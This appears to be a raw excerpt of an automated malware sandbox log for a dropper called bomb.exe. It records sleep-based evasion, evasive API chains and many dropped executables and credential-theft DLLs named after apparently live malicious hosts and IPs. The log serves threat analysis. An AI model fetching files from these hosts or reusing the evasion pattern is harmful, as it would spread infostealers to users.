Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597604	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597477	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 597017	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 596678	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 595657	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 594782	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 594407	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 594270	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 594136	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 593922	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 593766	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 593032	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 592828	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 592647	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 592488	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 592313	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 592157	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 592032	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591904	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591795	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591685	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591578	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591468	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591360	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591242	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591140	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 591030	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590917	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590813	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590647	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590391	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590265	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590153	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 590043	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589936	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589821	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589719	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589610	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589485	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589360	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589236	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 589100	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 588978	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 588856	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Thread delayed: delay time: 588750	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599663	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599435	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599202	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 599036	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598773	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598528	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598417	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598185	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 598063	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597938	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597702	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597581	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597457	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597216	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596982	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596473	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 596016	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595809	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595577	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595320	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595200	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 595085	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594966	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594702	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594464	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594348	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594161	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 594046	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 593933	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 593823	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 593716	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 593490	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592860	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592669	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592546	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592410	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592286	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592171	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 592062	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591924	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591796	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591653	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591514	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591375	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591230	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 591105	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 590989	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 590874	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 590765	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 590566	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 589860	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 589610	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 589360	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 589094	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 588863	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 588641	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 588453	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 588157	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 587994	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 587625	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 586860	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 586532	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 586328	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Thread delayed: delay time: 586032	Jump to behavior
Source: C:\Users\user\Desktop\httpmales.mugutu.comrevada66df29a06624c_cry.exe.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\sysvplervcs.exe	Thread delayed: delay time: 900000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\Desktop\bomb.exe	Window / User API: threadDelayed 4433	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe	Window / User API: threadDelayed 4945	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Window / User API: threadDelayed 7671	Jump to behavior
Source: C:\Users\user\Desktop\http147.45.44.104malesa66fd20ad95baf_Notepad.exe#us111.exe	Window / User API: threadDelayed 2002	Jump to behavior
Source: C:\Users\user\sysvplervcs.exe	Window / User API: threadDelayed 721
Source: C:\Users\user\sysvplervcs.exe	Window / User API: threadDelayed 4826
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6508
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 449
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 4766

Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\httpmales.mugutu.comyuop66d32ff81a663_lump.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\httpmales.mugutu.comrevada66e06cea88f93_bluesapphire.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66eb0d09c9f08_Gads.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\http77.105.161.194filecarrier_ratecon.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\a43486128347[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\httpmales.mugutu.comyuop66ebf725efe38_lyla.exe.exe	Jump to dropped file
Source: C:\Users\user\sysvplervcs.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1037419404.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\httpmales.mugutu.comyuop66cf535e3dcf9_BitcoinCore.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f13c8ec4580_uninstaller.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\GHJDBAKEHD.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\httpmales.mugutu.comprog66c2d861a5b4d_google.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\httpmales.mugutu.comyuop66e096a0354a7_Burn.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66d9ddcb9dbfe_Build.exe.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\httpmales.mugutu.comyuop66d5edf357fbf_BitcoinCore.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66d5ca151a052_stealcuniq.exe.exe	Jump to dropped file
Source: C:\Users\user\sysvplervcs.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\454830019.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sql[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\http77.105.161.194pdffile.exe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\sysvplervcs.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1534331641.exe	Jump to dropped file
Source: C:\Users\user\Desktop\bomb.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66b4f6893d3c3_shapr3D.exe.exe	Jump to dropped file

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Evaded block: after key decision	graph_4-4467
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Evaded block: after key decision	graph_4-4453
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Evaded block: after key decision	graph_4-4535

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Evasive API call chain: RegOpenKey,DecisionNodes,Sleep			graph_4-4474
Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	Evasive API call chain: RegQueryValue,DecisionNodes,Sleep			graph_4-5407

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe	API coverage: 3.7 %
Source: C:\Users\user\Desktop\httpjask.powerforxes.shopldmsfedf8679e8d2.exe#d12.exe	API coverage: 3.9 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API coverage: 6.4 %

Source: C:\Users\user\Desktop\http185.215.113.66newtpp.exe.exe

Code function: 4_2_0040D770

4_2_0040D770

Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -599157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -599032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -598838s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -598725s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -598605s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -598499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -598388s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -598157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -598044s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -597862s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -597604s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -597477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -597017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -596678s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -595891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -595657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -595203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -595063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -594782s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -594407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -594270s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -594136s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -593922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -593766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -593032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -592828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\bomb.exe TID: 5348	Thread sleep time: -592647s >= -30000s	Jump to behavior
